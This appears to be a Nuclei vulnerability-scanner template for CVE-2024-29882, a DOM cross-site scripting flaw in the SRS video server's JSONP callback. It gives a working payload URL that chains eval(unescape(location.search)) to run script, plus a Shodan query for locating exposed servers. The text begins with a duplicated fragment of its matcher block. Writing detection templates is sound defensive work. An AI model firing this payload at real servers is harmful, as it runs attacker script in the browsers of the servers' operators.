SRS" - "ConnectSRS</a>" condition: or case-insensitive: true # digest: 4a0a00473045022100910e5ce652f76d349702c7adc5d5b6b479e14b984978fa2f86a47498f11167d2022000daa49aed583b6da8b47060d9389e38c4d7046e2304d059377360d1d199f89e:922c64590222798bb761d5b6d8e72950

id: CVE-2024-29882

info:
  name: HTTP API DOM - XSS on JSONP callback
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    SRS is a simple, high-efficiency, real-time video server. SRS's `/api/v1/vhosts/vid-<id>?callback=<payload>` endpoint didn't filter the callback function name which led to injecting malicious javascript payloads and executing XSS ( Cross-Site Scripting). This vulnerability is fixed in 5.0.210 and 6.0.121.
  reference:
    - https://github.com/ossrs/srs/commit/244ce7bc013a0b805274a65132a2980680ba6b9d
    - https://github.com/ossrs/srs/security/advisories/GHSA-gv9r-qcjc-5hj7
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2024-29882
    cwe-id: CWE-79
    epss-score: 0.00043
    epss-percentile: 0.09568
  metadata:
    verified: true
    max-request: 1
    vendor: ossrs
    product: simple_realtime_server
    shodan-query: http.favicon.hash:1386054408
  tags: cve,cve2023,srs,dom,xss

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/console/en_index.html?alert(document.domain)#/vhosts/vid-xsedfv%3Fcallback=eval(unescape(location.search.slice(1)))%252f%252f'
        action: navigate

      - action: waitdialog
        name: object_dom

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - object_dom == true

      - type: word
        part: body
        words:
          - "<title>SRS"
          - "ConnectSRS</a>"
        condition: or
        case-insensitive: true
# digest: 4a0a00473045022100910e5ce652f76d349702c7adc5d5b6b479e14b984978fa2f86a47498f11167d2022000daa49aed583b6da8b47060d9389e38c4d7046e2304d059377360d1d199f89e:922c64590222798bb761d5b6d8e72950